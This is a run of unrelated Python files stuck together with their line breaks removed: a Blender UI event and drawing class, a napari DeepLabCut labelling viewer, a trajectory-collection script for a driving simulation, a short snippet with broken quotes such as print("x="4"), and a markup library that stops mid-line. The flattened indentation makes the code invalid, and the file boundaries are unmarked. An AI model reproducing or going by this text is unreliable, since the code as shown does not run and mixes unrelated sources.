self._tooltip_mouse == self.actions.mouse and not force: return self._tooltip_mouse = self.actions.mouse if self._tooltip.width_pixels is None or type(self._tooltip.width_pixels) is str or self._tooltip._mbp_width is None or self._tooltip.height_pixels is None or type(self._tooltip.height_pixels) is str or self._tooltip._mbp_height is None: ttl,ttt = self.actions.mouse else: ttl = self.actions.mouse.x if self.actions.mouse.x < self._body.width_pixels/2 else self.actions.mouse.x - (self._tooltip.width_pixels + (self._tooltip._mbp_width or 0)) ttt = self.actions.mouse.y if self.actions.mouse.y > self._body.height_pixels/2 else self.actions.mouse.y + (self._tooltip.height_pixels + (self._tooltip._mbp_height or 0)) hp = self._body.height_pixels if type(self._body.height_pixels) is not str else 0.0 self._tooltip.reposition(left=ttl, top=ttt - hp) def removed_element(self, ui_element): if self._under_mouse and self._under_mouse.is_descendant_of(ui_element): self._under_mouse = None if self._under_mousedown and self._under_mousedown.is_descendant_of(ui_element): self._under_mousedown = None if self._focus and self._focus.is_descendant_of(ui_element): self._focus = None # @profiler.function def update(self, context, event): if context.area != self._area: return # self._ui_scale = Globals.drawing.get_dpi_mult() UI_Element_PreventMultiCalls.reset_multicalls() w,h = context.region.width, context.region.height if self._last_w != w or self._last_h != h: # print('Document:', (self._last_w, self._last_h), (w,h)) self._last_w,self._last_h = w,h self._body.dirty(cause='changed document size', children=True) self._body.dirty_flow() tag_redraw_all("UI_Element update: w,h change") if DEBUG_COLOR_CLEAN: tag_redraw_all("UI_Element DEBUG_COLOR_CLEAN") #self.actions.update(context, event, self._timer, print_actions=False) # self.actions.update(context, event, print_actions=False) if self._sticky_element and not self._sticky_element.is_visible: self._sticky_element = None self._mx,self._my = self.actions.mouse if self.actions.mouse else (-1,-1) if not self.ignore_hover_change: self._under_mouse = self._body.get_under_mouse(self.actions.mouse) if self._sticky_element: if self._sticky_element.get_mouse_distance(self.actions.mouse) < self._sticky_dist * self._ui_scale: if self._under_mouse is None or not self._under_mouse.is_descendant_of(self._sticky_element): self._under_mouse = self._sticky_element next_message = None if self._under_mouse and self._under_mouse.title_with_for(): # and not self._under_mouse.disabled: next_message = self._under_mouse.title_with_for() if self._under_mouse.disabled: next_message = f'(Disabled) {next_message}' if self._tooltip_message != next_message: self._tooltip_message = next_message self._tooltip_mouse = None self._tooltip_wait = time.time() + self.tooltip_delay self._tooltip.is_visible = False if self._tooltip_message and time.time() > self._tooltip_wait: if self._tooltip_mouse != self.actions.mouse or self._tooltip.innerText != self._tooltip_message or not self._tooltip.is_visible: # TODO: markdown support?? self._tooltip.innerText = self._tooltip_message self._tooltip.is_visible = True and self.show_tooltips self._reposition_tooltip_before_draw = True tag_redraw_all("reposition tooltip") self.fsm.update() self._last_mx = self._mx self._last_my = self._my self._last_mouse = self.actions.mouse if not self.ignore_hover_change: self._last_under_mouse = self._under_mouse uictrld = False uictrld |= self._under_mouse is not None and self._under_mouse != self._body uictrld |= self.fsm.state != 'main' uictrld |= self._focus_full # uictrld |= self._focus is not None return {'hover'} if uictrld else None def _addrem_pseudoclass(self, pseudoclass, remove_from=None, add_to=None): rem = remove_from.get_pathToRoot() if remove_from else [] add = add_to.get_pathToRoot() if add_to else [] rem.reverse() add.reverse() roots = [] if rem: roots.append(rem[0]) if add: roots.append(add[0]) while rem and add and rem[0] == add[0]: rem = rem[1:] add = add[1:] # print(f'addrem_pseudoclass: {pseudoclass} {rem} {add}') self.defer_cleaning = True for root in roots: root.defer_dirty_propagation = True for e in rem: e.del_pseudoclass(pseudoclass) for e in add: e.add_pseudoclass(pseudoclass) for root in roots: root.defer_dirty_propagation = False self.defer_cleaning = False def debug_print(self): print('') print('UI_Document.debug_print') self._body.debug_print(0, set()) def debug_print_toroot(self, fromHovered=True, fromFocused=False): print('') print('UI_Document.debug_print_toroot') if fromHovered: self._debug_print(self._under_mouse) if fromFocused: self._debug_print(self._focus) def _debug_print(self, ui_from): # debug print! path = ui_from.get_pathToRoot() for i,ui_elem in enumerate(reversed(path)): def tprint(*args, extra=0, **kwargs): print(' '*(i+extra), end='') print(*args, **kwargs) tprint(str(ui_elem)) tprint(f'selector={ui_elem._selector}', extra=1) tprint(f'l={ui_elem._l} t={ui_elem._t} w={ui_elem._w} h={ui_elem._h}', extra=1) @property def sticky_element(self): return self._sticky_element @sticky_element.setter def sticky_element(self, element): self._sticky_element = element def clear_last_under(self): self._last_under_mouse = None def handle_hover(self, change_cursor=True): # handle :hover, on_mouseenter, on_mouseleave if self.ignore_hover_change: return if change_cursor and self._under_mouse and self._under_mouse._tagName != 'body': cursor = self._under_mouse._computed_styles.get('cursor', 'default') Globals.cursors.set(convert_token_to_cursor(cursor)) if self._under_mouse == self._last_under_mouse: return if self._under_mouse and not self._under_mouse.can_hover: return self._addrem_pseudoclass('hover', remove_from=self._last_under_mouse, add_to=self._under_mouse) if self._last_under_mouse: self._last_under_mouse.dispatch_event('on_mouseleave') if self._under_mouse: self._under_mouse.dispatch_event('on_mouseenter') def handle_mousemove(self, ui_element=None): ui_element = ui_element or self._under_mouse if ui_element is None: return if self._last_mouse == self.actions.mouse: return ui_element.dispatch_event('on_mousemove') def handle_keypress(self, ui_element=None): ui_element = ui_element or self._focus if self.actions.pressed('clipboard paste') and ui_element: ui_element.dispatch_event('on_paste', clipboardData=bpy.context.window_manager.clipboard) pressed = self.actions.as_char(self.actions.just_pressed) if pressed and ui_element: ui_element.dispatch_event('on_keypress', key=pressed) @FSM.on_state('main', 'enter') def modal_main_enter(self): Globals.cursors.set('DEFAULT') @FSM.on_state('main') def modal_main(self): # print('UI_Document.main', self.actions.event_type, time.time()) if self.actions.just_pressed: pressed = self.actions.just_pressed if pressed not in {'WINDOW_DEACTIVATE'}: if self._focus and self._focus_full: self._focus.dispatch_event('on_keypress', key=pressed) elif self._under_mouse: self._under_mouse.dispatch_event('on_keypress', key=pressed) self.handle_hover() self.handle_mousemove() if self.actions.pressed('MIDDEMOUSE'): return 'scroll' if self.actions.pressed('LEFTMOUSE', unpress=False, ignoremods=True, ignoremulti=True): if self._under_mouse == self._body: # clicking body always blurs focus self.blur() elif UI_Document.allow_disabled_to_blur and self._under_mouse and self._under_mouse.is_disabled: # user clicked on disabled element, so blur current focused element self.blur() return 'mousedown' if self.actions.pressed('SHIFT+F10'): profiler.clear() return if self.actions.pressed('SHIFT+F11'): profiler.printout() self.debug_print() return if self.actions.pressed('CTRL+SHIFT+F11'): self.debug_print_toroot() print(f'{self._under_mouse._computed_styles}') return # if self.actions.pressed('RIGHTMOUSE') and self._under_mouse: # self._debug_print(self._under_mouse) # #print('focus:', self._focus) if self.actions.pressed({'scroll top', 'scroll bottom'}, unpress=False): move = 100000 * (-1 if self.actions.pressed({'scroll top'}) else 1) self.actions.unpress() if self._get_scrollable(): self._scroll_element.scrollTop = self._scroll_last.y + move self._scroll_element._setup_ltwh(recurse_children=False) if self.actions.pressed({'scroll', 'scroll up', 'scroll down'}, unpress=False): if self.actions.event_type == 'TRACKPADPAN': move = self.actions.scroll[1] # self.actions.mouse.y - self.actions.mouse_prev.y # print(f'UI_Document.update: trackpad pan {move}') else: d = self.wheel_scroll_lines * 8 * Globals.drawing.get_dpi_mult() move = Globals.drawing.scale(d) * (-1 if self.actions.pressed({'scroll up'}) else 1) self.actions.unpress() if self._get_scrollable(): self._scroll_element.scrollTop = self._scroll_last.y + move self._scroll_element._setup_ltwh(recurse_children=False) # if self.actions.pressed('F8') and self._under_mouse: # print('\n\n') # for e in self._under_mouse.get_pathFromRoot(): # print(e) # print(e._dirty_causes) # for s in e._debug_list: # print(f' {s}') if False: print('---------------------------') if self._focus: print('FOCUS', self._focus, self._focus.pseudoclasses) else: print('FOCUS', None) if self._under_down: print('DOWN', self._under_down, self._under_down.pseudoclasses) else: print('DOWN', None) if under_mouse: print('UNDER', under_mouse, under_mouse.pseudoclasses) else: print('UNDER', None) def _get_scrollable(self): # find first along root to path that can scroll if not self._under_mouse: return None self._scroll_element = next((e for e in self._under_mouse.get_pathToRoot() if e.is_scrollable_y), None) if self._scroll_element: self._scroll_last = RelPoint2D((self._scroll_element.scrollLeft, self._scroll_element.scrollTop)) return self._scroll_element @FSM.on_state('scroll', 'can enter') def scroll_canenter(self): if not self._get_scrollable(): return False @FSM.on_state('scroll', 'enter') def scroll_enter(self): self._scroll_point = self.actions.mouse self.ignore_hover_change = True Globals.cursors.set('SCROLL_Y') @FSM.on_state('scroll') def scroll_main(self): if self.actions.released('MIDDLEMOUSE', ignoremods=True, ignoremulti=True): # done scrolling return 'main' nx = self._scroll_element.scrollLeft + (self._scroll_point.x - self._mx) ny = self._scroll_element.scrollTop - (self._scroll_point.y - self._my) self._scroll_element.scrollLeft = nx self._scroll_element.scrollTop = ny self._scroll_point = self.actions.mouse self._scroll_element._setup_ltwh(recurse_children=False) @FSM.on_state('scroll', 'exit') def scroll_exit(self): self.ignore_hover_change = False @FSM.on_state('mousedown', 'can enter') def mousedown_canenter(self): return self._focus or ( self._under_mouse and self._under_mouse != self._body and not self._under_mouse.is_disabled ) @FSM.on_state('mousedown', 'enter') def mousedown_enter(self): self._mousedown_time = time.time() self._under_mousedown = self._under_mouse if not self._under_mousedown: # likely, self._under_mouse or an ancestor was deleted? # mousedown main event handler below will switch FSM back to main, effectively ignoring the mousedown event # see RetopoFlow issue #857 self.blur() return self._addrem_pseudoclass('active', add_to=self._under_mousedown) self._under_mousedown.dispatch_event('on_mousedown') # print(self._under_mouse.get_pathToRoot()) change_focus = self._focus != self._under_mouse if change_focus: if self._under_mouse.can_focus: # element under mouse takes focus (or whichever it's for points to) if self._under_mouse.forId: f = self._under_mouse.get_for_element() if f and f.can_focus: self.focus(f) else: self.focus(self._under_mouse) else: self.focus(self._under_mouse) elif self._focus and self._is_ancestor(self._focus, self._under_mouse): # current focus is an ancestor of new element, so don't blur! pass else: self.blur() @FSM.on_state('mousedown') def mousedown_main(self): if not self._under_mousedown: return 'main' if self.actions.released('LEFTMOUSE', ignoremods=True, ignoremulti=True): # done with mousedown return 'focus' if self._under_mousedown.can_focus else 'main' if self.actions.pressed('RIGHTMOUSE', ignoremods=True, unpress=False): self._under_mousedown.dispatch_event('on_mousedown') self.handle_hover(change_cursor=False) self.handle_mousemove(ui_element=self._under_mousedown) self.handle_keypress(ui_element=self._under_mousedown) @FSM.on_state('mousedown', 'exit') def mousedown_exit(self): if not self._under_mousedown: # likely, self._under_mousedown or an ancestor was deleted while under mousedown # need to reset variables enough to get us back to main FSM state! self._last_under_click = None self._last_click_time = 0 self.ignore_hover_change = False return self._under_mousedown.dispatch_event('on_mouseup') under_mouseclick = self._under_mousedown click = False click |= time.time() - self._mousedown_time < self.allow_click_time click |= self._under_mousedown.get_mouse_distance(self.actions.mouse) <= self.max_click_dist * self._ui_scale if not click: # find closest common ancestor of self._under_mouse and self._under_mousedown that is getting clicked ancestors0 = self._under_mousedown.get_pathFromRoot() ancestors1 = self._under_mouse.get_pathFromRoot() if self._under_mouse else [] ancestors = [a0 for (a0, a1) in zip(ancestors0, ancestors1) if a0 == a1 and a0.get_mouse_distance(self.actions.mouse) < 1] if ancestors: under_mouseclick = ancestors[-1] click = True # print('mousedown_exit', time.time()-self._mousedown_time, self.allow_click_time, self.actions.mouse, self._under_mousedown.get_mouse_distance(self.actions.mouse), self.max_click_dist) if click: # old/simple: self._under_mouse == self._under_mousedown: dblclick = True dblclick &= under_mouseclick == self._last_under_click dblclick &= time.time() < self._last_click_time + self.doubleclick_time under_mouseclick.dispatch_event('on_mouseclick') self._last_under_click = under_mouseclick if dblclick: under_mouseclick.dispatch_event('on_mousedblclick') # self._last_under_click = None # if self._under_mousedown: # # if applicable, send mouseclick events to ui_element indicated by forId # ui_for = self._under_mousedown.get_for_element() # print(f'mousedown_exit:') # print(f' ui under: {self._under_mousedown}') # print(f' ui for: {ui_for}') # if ui_for: ui_for.dispatch_event('on_mouseclick') self._last_click_time = time.time() else: self._last_under_click = None self._last_click_time = 0 self._addrem_pseudoclass('active', remove_from=self._under_mousedown) # self._under_mousedown.del_pseudoclass('active') def _is_ancestor(self, ancestor, descendant): return ancestor in descendant.get_pathToRoot() def blur(self, stop_at=None): self._focus_full = False if self._focus is None: return self._focus.del_pseudoclass('focus') self._focus.dispatch_event('on_blur') self._focus.dispatch_event('on_focusout', stop_at=stop_at) self._addrem_pseudoclass('active', remove_from=self._focus) self._focus = None def focus(self, ui_element, full=False): if ui_element is None: return if self._focus == ui_element: return stop_focus_at = None if self._focus: stop_blur_at = None p_focus = ui_element.get_pathFromRoot() p_blur = self._focus.get_pathFromRoot() for i in range(min(len(p_focus), len(p_blur))): if p_focus[i] != p_blur[i]: stop_focus_at = p_focus[i] stop_blur_at = p_blur[i] break self.blur(stop_at=stop_blur_at) #print('focusout to', p_blur, stop_blur_at) #print('focusin from', p_focus, stop_focus_at) self._focus_full = full self._focus = ui_element self._focus.add_pseudoclass('focus') self._focus.dispatch_event('on_focus') self._focus.dispatch_event('on_focusin', stop_at=stop_focus_at) @FSM.on_state('focus') def focus_main(self): if not self._focus: return 'main' if self._focus_full: pass if self.actions.pressed('LEFTMOUSE', unpress=False): return 'mousedown' # if self.actions.pressed('RIGHTMOUSE'): # self._debug_print(self._focus) # if self.actions.pressed('ESC'): # self.blur() # return 'main' self.handle_hover() self.handle_mousemove() self.handle_keypress() if not self._focus: return 'main' def force_clean(self, context): if self.defer_cleaning: return time_start = time.time() w,h = context.region.width, context.region.height sz = Size2D(width=w, max_width=w, height=h, max_height=h) UI_Element_PreventMultiCalls.reset_multicalls() Globals.ui_draw.update() if Globals.drawing.get_dpi_mult() != self._ui_scale: print(f'DPI CHANGED: {self._ui_scale} -> {Globals.drawing.get_dpi_mult()}') self._ui_scale = Globals.drawing.get_dpi_mult() self._body.dirty(cause='DPI changed', children=True) self._body.dirty_styling() self._body.dirty_flow(children=True) if (w,h) != self._last_sz: self._last_sz = (w,h) self._body.dirty_flow() # self._body.dirty('region size changed', 'style', children=True) # UI_Element_PreventMultiCalls.reset_multicalls() for o in self._callbacks['preclean']: o._call_preclean() self._body.clean() for o in self._callbacks['postclean']: o._call_postclean() self._body._layout( # linefitter=LineFitter(left=0, top=h-1, width=w, height=h), fitting_size=sz, fitting_pos=Point2D((0,h-1)), parent_size=sz, nonstatic_elem=self._body, table_data={}, ) self._body.set_view_size(sz) for o in self._callbacks['postflow']: o._call_postflow() for fn in self._callbacks['postflow once']: fn() self._callbacks['postflow once'].clear() # UI_Element_PreventMultiCalls.reset_multicalls() self._body._layout( # linefitter=LineFitter(left=0, top=h-1, width=w, height=h), fitting_size=sz, fitting_pos=Point2D((0,h-1)), parent_size=sz, nonstatic_elem=self._body, table_data={}, ) self._body.set_view_size(sz) if self._reposition_tooltip_before_draw: self._reposition_tooltip_before_draw = False self._reposition_tooltip() # @profiler.function def draw(self, context): if self._area != context.area: return Globals.drawing.glCheckError('UI_Document.draw: start') time_start = time.time() self.force_clean(context) Globals.drawing.glCheckError('UI_Document.draw: setting options') ScissorStack.start(context) bgl.glClearColor(0, 0, 0, 0) bgl.glBlendColor(0, 0, 0, 0) bgl.glBlendFunc(bgl.GL_SRC_ALPHA, bgl.GL_ONE_MINUS_SRC_ALPHA) bgl.glEnable(bgl.GL_BLEND) bgl.glEnable(bgl.GL_SCISSOR_TEST) bgl.glDisable(bgl.GL_DEPTH_TEST) bgl.glClear(bgl.GL_DEPTH_BUFFER_BIT) Globals.drawing.glCheckError('UI_Document.draw: drawing') self._body.draw() ScissorStack.end() self._draw_count += 1 self._draw_time += time.time() - time_start if self._draw_count % 100 == 0: fps = (self._draw_count / self._draw_time) if self._draw_time>0 else float('inf') self._draw_fps = fps # print('~%f fps (%f / %d = %f)' % (self._draw_fps, self._draw_time, self._draw_count, self._draw_time / self._draw_count)) self._draw_count = 0 self._draw_time = 0 Globals.drawing.glCheckError('UI_Document.draw: done') ui_document = Globals.set(UI_Document()) 10-100 # -*- coding: utf-8 -*- from . import auth from . import etc from . import errordlclabel/gui.py import napari import numpy as np import warnings from dlclabel.io import handle_path from dlclabel.layers import KeyPoints from dlclabel.widgets import KeypointsDropdownMenu from napari.layers import Image, Layer from PyQt5.QtWidgets import QMessageBox, QFileDialog from typing import List, Optional, Sequence, Union # TODO Add vectors for paths trajectory # TODO Add video reader plugin # TODO Refactor KeyPoints with KeyPointsData # Hack to save a KeyPoints layer without showing the Save dialog def _save_layers_dialog(self, selected=False): """Save layers (all or selected) to disk, using ``LayerList.save()``. Parameters ---------- selected : bool If True, only layers that are selected in the viewer will be saved. By default, all layers are saved. """ selected_layers = self.viewer.layers.selected msg = "" if not len(self.viewer.layers): msg = "There are no layers in the viewer to save" elif selected and not len(selected_layers): msg = ( 'Please select one or more layers to save,' '\nor use "Save all layers..."' ) if msg: QMessageBox.warning(self, "Nothing to save", msg, QMessageBox.Ok) return if len(selected_layers) == 1 and isinstance(selected_layers[0], KeyPoints): self.viewer.layers.save("", selected=True) else: filename, _ = QFileDialog.getSaveFileName( parent=self, caption=f'Save {"selected" if selected else "all"} layers', directory=self._last_visited_dir, # home dir by default ) if filename: self.viewer.layers.save(filename, selected=selected) class DLCViewer(napari.Viewer): def __init__(self): super(DLCViewer, self).__init__(title="deeplabcut") # Inherit parent class' key bindings self.class_keymap.update(super(DLCViewer, self).class_keymap) self.layers.events.changed.connect(self.on_change) self._dock_widgets = [] # Hack the QSS style sheet to add a KeyPoints layer type icon missing_style = """\n\nQLabel#KeyPoints { image: url(":/themes/{{ folder }}/new_points.svg"); }""" self.window.raw_stylesheet += missing_style self.window._update_palette(None) # Substitute default menu action with custom one for action in self.window.file_menu.actions(): if "save selected layer" in action.text().lower(): action.disconnect() action.triggered.connect( lambda: _save_layers_dialog( self.window.qt_viewer, selected=True, ) ) break # Storage for extra image metadata that are relevant to other layers. # These are updated anytime images are added to the Viewer # and passed on to the other layers upon creation. self._images_meta = dict() def on_change(self, event): if event.type == "added": layer = event.item root = layer.metadata.get("root") # Hack to have the save dialog open right in the labeled-data folder if root: self.window.qt_viewer._last_visited_dir = root if isinstance(layer, Image): paths = layer.metadata.get("paths") if paths is None: return # Store the metadata and pass them on to the other layers with warnings.catch_warnings(): warnings.simplefilter(action="ignore", category=FutureWarning) self._images_meta.update({"paths": paths, "shape": layer.shape}) for layer_ in self.layers: if not isinstance(layer_, Image): self._remap_frame_indices(layer_) # Ensure the images are always underneath the other layers n_layers = len(self.layers) if n_layers > 1: self.layers.move_selected(event.index, 0) elif isinstance(layer, KeyPoints): if not self._dock_widgets: menu = KeypointsDropdownMenu(layer) self._dock_widgets.append( self.window.add_dock_widget( menu, name="keypoints menu", area="bottom" ) ) layer.smart_reset(event=None) # Update current keypoint upon loading data self.bind_key("Down", layer.next_keypoint, overwrite=True) self.bind_key("Up", layer.prev_keypoint, overwrite=True) elif event.type == "removed": layer = event.item if isinstance(layer, KeyPoints): while self._dock_widgets: widget = self._dock_widgets.pop() self.window.remove_dock_widget(widget) elif isinstance(layer, Image): self._images_meta = dict() def _remap_frame_indices(self, layer: Layer): """Ensure consistency between layers' data and the corresponding images.""" if not self._images_meta: return new_paths = self._images_meta["paths"] paths = layer.metadata.get("paths") if paths is not None and np.any(layer.data): paths_map = dict(zip(range(len(paths)), paths)) # Discard data if there are missing frames missing = [i for i, path in paths_map.items() if path not in new_paths] if missing: if isinstance(layer.data, list): inds_to_remove = [ i for i, verts in enumerate(layer.data) if verts[0, 0] in missing ] else: inds_to_remove = np.flatnonzero(np.isin(layer.data[:, 0], missing)) layer.selected_data = inds_to_remove layer.remove_selected() for i in missing: paths_map.pop(i) # Check now whether there are new frames temp = {k: new_paths.index(v) for k, v in paths_map.items()} data = layer.data if isinstance(data, list): for verts in data: verts[:, 0] = np.vectorize(temp.get)(verts[:, 0]) else: data[:, 0] = np.vectorize(temp.get)(data[:, 0]) layer.data = data layer.metadata.update(self._images_meta) def _advance_step(self, event): ind = (self.dims.current_step[0] + 1) % self.dims.nsteps[0] self.dims.set_current_step(0, ind) def add_points( self, data=None, *, properties=None, text=None, symbol="o", size=10, edge_width=0, edge_color="black", edge_color_cycle=None, edge_colormap="viridis", edge_contrast_limits=None, face_color="white", face_color_cycle=None, face_colormap="viridis", face_contrast_limits=None, n_dimensional=False, name="keypoints", metadata=None, scale=None, translate=None, opacity=1, blending="translucent", visible=True, ) -> Optional[KeyPoints]: # Disable the creation of Points layers via the button if not properties: return layer = KeyPoints( data=data, properties=properties, text=text, symbol=symbol, size=size, edge_width=edge_width, edge_color=edge_color, edge_color_cycle=edge_color_cycle, edge_colormap=edge_colormap, edge_contrast_limits=edge_contrast_limits, face_color=face_color, face_color_cycle=face_color_cycle, face_colormap=face_colormap, face_contrast_limits=face_contrast_limits, n_dimensional=n_dimensional, name=name, metadata=metadata, scale=scale, translate=translate, opacity=opacity, blending=blending, visible=visible, ) self.dims.events.current_step.connect(layer.smart_reset, position="last") layer.events.query_next_frame.connect(self._advance_step) # Hack to avoid napari's silly variable type guess, # where property is understood as continuous if # there are more than 16 unique categories... with layer.block_update_properties(): layer.face_color = "label" layer.face_color_mode = "cycle" self.add_layer(layer) layer.mode = "add" return layer def add_layer(self, layer: Layer) -> Layer: if not isinstance(layer, Image): self._remap_frame_indices(layer) return super(DLCViewer, self).add_layer(layer) def open( self, path: Union[str, Sequence[str]], *, stack: bool = False, plugin: Optional[str] = None, layer_type: Optional[str] = None, **kwargs, ) -> List[Layer]: return super(DLCViewer, self).open( handle_path(path), stack=stack, plugin=plugin, layer_type=layer_type, **kwargs, ) def show(): with napari.gui_qt(): return DLCViewer() sanatb97/Python-Compiler x=4 y=7 while(y>x): print("y>x") y=y-1 if(x==y): print("x==y"") if(x==4): print("x="4") print('End of program'); import pickle import copy import os import numpy as np from rl.envs import make_vec_envs ''' collect trajectory data of other cars in the env and the label of the cars' traits make sure each trajectory has and only has one car device: cpu or cuda0 train_data: True if collect training data, False if collect testing data config: config object ''' def collectMany2OneData(device, train_data, config): # always use 'TIntersectionPredictFrontAct-v0', since the observation is compatible for both our method and Morton baseline env_name = 'TIntersectionPredictFrontAct-v0' # for render env_num = 1 if config.pretext.render else config.pretext.num_processes human_num = config.env_config.car.max_veh_num # create parallel envs envs = make_vec_envs(env_name, config.env_config.env.seed, env_num, config.env_config.reward.gamma, None, device, allow_early_resets=True, config=config, wrap_pytorch=False) # key list for observation from env ob_key_list = ['pretext_nodes', 'pretext_spatial_edges', 'pretext_temporal_edges', 'labels', 'pretext_masks', 'dones'] # key list for saved data save_key_list = ['pretext_nodes', 'pretext_spatial_edges', 'pretext_temporal_edges', 'labels'] # collect data for pretext training # list of dicts, the value of each key is a list of 30 data_list = [] # list for all data collected data = {} # buffer for data from env # initialize buffer to store data from env # each data[key] = list of traj_len, each element of the list = array (nenv, human_num, ?) for key in ob_key_list: data[key] = [] obs = envs.reset() # 1 epoch -> 1 file for epoch in range(10): print('collect data epoch', epoch) # how may traj do we want in one file # number of collected traj in a file will be >= config.pretext.num_data_per_file while(len(data_list)) < config.pretext.num_data_per_file: if config.pretext.render: envs.render() # NOTE: the robot doesn't move! action = np.zeros((env_num, ), dtype=int) # save the previous obs before it is overwritten prev_obs = copy.deepcopy(obs) obs, rew, done, info = envs.step(action) # pretext node: [px, ax] of other cars pretext_nodes = np.concatenate((prev_obs['pretext_nodes'], prev_obs['pretext_actions']), axis=-1) data['pretext_nodes'].append(copy.deepcopy(pretext_nodes)) data['pretext_spatial_edges'].append(copy.deepcopy(prev_obs['pretext_spatial_edges'])) data['pretext_temporal_edges'].append(copy.deepcopy(prev_obs['pretext_temporal_edges'])) data['labels'].append(copy.deepcopy(prev_obs['true_labels'])) data['pretext_masks'].append(copy.deepcopy(prev_obs['pretext_masks'])) data['dones'].append(copy.deepcopy(done)) # save data to data_list for every 20 steps if len(data['labels']) == config.pretext.num_steps: # process traj, keep the last sub-traj of non-dummy human in each traj processed_data = process_traj(data, save_key_list, env_num, config.pretext.num_steps, human_num) data_list.extend(copy.deepcopy(processed_data)) data.clear() for key in ob_key_list: data[key] = [] print('number of traj in a file:', len(data_list)) # save observations as pickle files # observations is a list of dict [{'x':, 'intent':, 'u':}, ...] filePath = os.path.join(config.pretext.data_save_dir, 'train') if train_data \ else os.path.join(config.pretext.data_save_dir, 'test') if not os.path.isdir(filePath): os.makedirs(filePath) filePath = os.path.join(filePath, str(epoch)+'.pickle') with open(filePath, 'wb') as f: pickle.dump(data_list, f, protocol=pickle.HIGHEST_PROTOCOL) data_list.clear() envs.close() ''' process the observation from env, and convert then to the saving format for training input data: dictionary of nested lists output return value: list of dictionaries of np array, where each dict = one traj data: traj_len steps of observation data from env, each key has value with shape [traj_len, nenv, human_num, ?] save_key_list: list of observation keys to be saved nenv: number of parallel env traj_len: max traj length of each traj, slice the input traj data into traj with length = traj_len human_num: max number of other cars in env ''' def process_traj(data, save_key_list, nenv, traj_len, human_num): new_data = [] # convert each key in data to np array for key in data: data[key] = np.array(data[key]) # calculate the start index for each traj humans_masks = np.array(data['pretext_masks']) # [traj_len, nenv, human_num] done_masks = np.expand_dims(np.array(data['dones']), axis=-1) # [traj_len, nenv, 1] # add a sentinel in the front humans_masks = np.concatenate((np.zeros((1, nenv, human_num)), humans_masks), axis=0) # 21, nenv, human_num humans_start_idx = np.logical_not(humans_masks).cumsum(axis=0).argmax(axis=0) done_masks = np.concatenate((np.zeros((1, nenv, 1), dtype=bool), done_masks), axis=0) done_start_idx = done_masks.cumsum(axis=0).argmax(axis=0) # if done_masks are all zeros, done_start_idx should be 0 start_idx = np.maximum(humans_start_idx, done_start_idx) # slice the traj and save in return value for i in range(nenv): # for each env for j in range(human_num): # if traj_len = 20, the largest max index is 18 (so that each traj has at least 2 steps) if start_idx[i, j] < traj_len-1: # the largest max index is 15 (so that each traj has at least 5 steps) # if start_idx[i, j] < traj_len - 4: cur_dict = {} for key in save_key_list: # only save one label for each traj if key == 'labels': cur_dict[key] = data[key][-1, i, j] else: # data[key]: [traj_len, nenv, human_num, ?] cur_dict[key] = data[key][start_idx[i, j]:, i, j] # change the px of pretext_nodes to odometry (displacement since 20 steps ago) cur_dict['pretext_nodes'][:, 0] = cur_dict['pretext_nodes'][:, 0] - cur_dict['pretext_nodes'][0, 0] # error check: all px must be non-negative assert (cur_dict['pretext_nodes'][:, 0] >= 0).all(), cur_dict['pretext_nodes'][:, 0] new_data.append(copy.deepcopy(cur_dict)) return new_data pithy/markup.py # Dedicated to the public domain under CC0: https://creativecommons.org/publicdomain/zero/1.0/. ''' Base Markup type for Html, Svg, Xml, as well as legacy SGML formats. ''' import re from collections import Counter from itertools import chain from typing import (Any, Callable, ClassVar, Dict, Generator, Iterable, Iterator, List, Match, Optional, Tuple, Type, TypeVar, Union, cast, overload) from xml.etree.ElementTree import Element from .desc import repr_lim from .exceptions import ConflictingValues, DeleteNode, FlattenNode, MultipleMatchesError, NoMatchError from .iterable import window_iter, window_pairs from .string import EscapedStr # Handle lxml comments if available; these are produced by html5_parser. try: from lxml.etree import Comment except ImportError: Comment = object() # type: ignore # Comment is a cyfunction, so we can fall back to a dummy object. _T = TypeVar('_T') # Attr values are currently Any so that we can preserve exact numerical values. MuAttrs = Dict[str,Any] MuAttrItem = Tuple[str,Any] MuChild = Union[str,'EscapedStr','Mu'] MuChildren = List[MuChild] MuChildOrChildren = Union[MuChild,Iterable[MuChild]] _Mu = TypeVar('_Mu', bound='Mu') _MuChild = TypeVar('_MuChild', bound='MuChild') MuPred = Callable[[_Mu],bool] MuVisitor = Callable[[_Mu],None] MuIterVisitor = Callable[[_Mu],Iterator[_T]] class Present: '''The Present class is used to only set an attribute if `is_present` evaluates to True.''' def __init__(self, is_present: Any): self.is_present = bool(is_present) class Mu: ''' Mu root class for building Html/Sgml/Xml document trees. Unlike xml.etree.ElementTree.Element, child nodes and text are interleaved. ''' tag = '' # Subclasses can override the class tag, or give each instance its own tag attribute. tag_types:ClassVar[dict[str,type['Mu']]] = {} # Dispatch table mapping tag names to Mu subtypes. inline_tags:ClassVar[frozenset[str]] = frozenset() # Set of tags that should be rendered inline. void_tags:ClassVar[frozenset[str]] = frozenset() # Set of tags that should be rendered as "void tags" (for HTML correctness). ws_sensitive_tags:ClassVar[frozenset[str]] = frozenset() # Set of tags that are whitespace sensitive. replaced_attrs:ClassVar[Dict[str,str]] = {} # Map of attribute names to replacement values for rendering. __slots__ = ('attrs', 'ch', '_orig', '_parent') def __init__(self:_Mu, *, tag:str='', attrs:MuAttrs=None, ch:MuChildOrChildren=(), cl:Iterable[str]=None, _orig:_Mu=None, _parent:'Mu'=None, **kw_attrs:Any) -> None: ''' Note: the initializer uses `attrs` dict and `ch` list references if provided, resulting in data sharing. This is done for two reasons: * avoid excess copying during deserialization from json, msgpack, or similar; * allow for creation of subtree nodes (with _orig/_parent set) that alias the `attr` and `ch` collections. Normally, nodes do not hold a reference to parent; this makes Mu trees acyclic. However, various Mu methods have a `traversable` option, which will return subtrees with the _orig/_parent refs set. Such "subtree nodes" can use the `next` and `prev` methods in addition to `pick` and friends. ''' # TODO: handle tag!!! if attrs is None: attrs = {} # Important: use existing dict ref if provided. for k, v in kw_attrs.items(): attrs[k.replace('_', '-')] = v self.attrs = attrs if cl is not None: if not isinstance(cl, str): cl = ' '.join(cl) if cl != attrs.setdefault('class', cl): raise ConflictingValues((attrs['class'], cl)) if isinstance(ch, mu_child_classes): # Single child argument; wrap it in a list. self.ch:MuChildren = [ch] elif isinstance(ch, list): self.ch = ch # Important: use an existing list ref if provided. This allows subnodes to alias original contents. for c in ch: assert isinstance(c, mu_child_classes), c else: self.ch = list(ch) for c in self.ch: assert isinstance(c, mu_child_classes), c self._orig = _orig self._parent = _parent def __repr__(self) -> str: return f'{type(self).__name__}{self}' def __str__(self) -> str: subnode = '' if self._orig is None else '$' words = 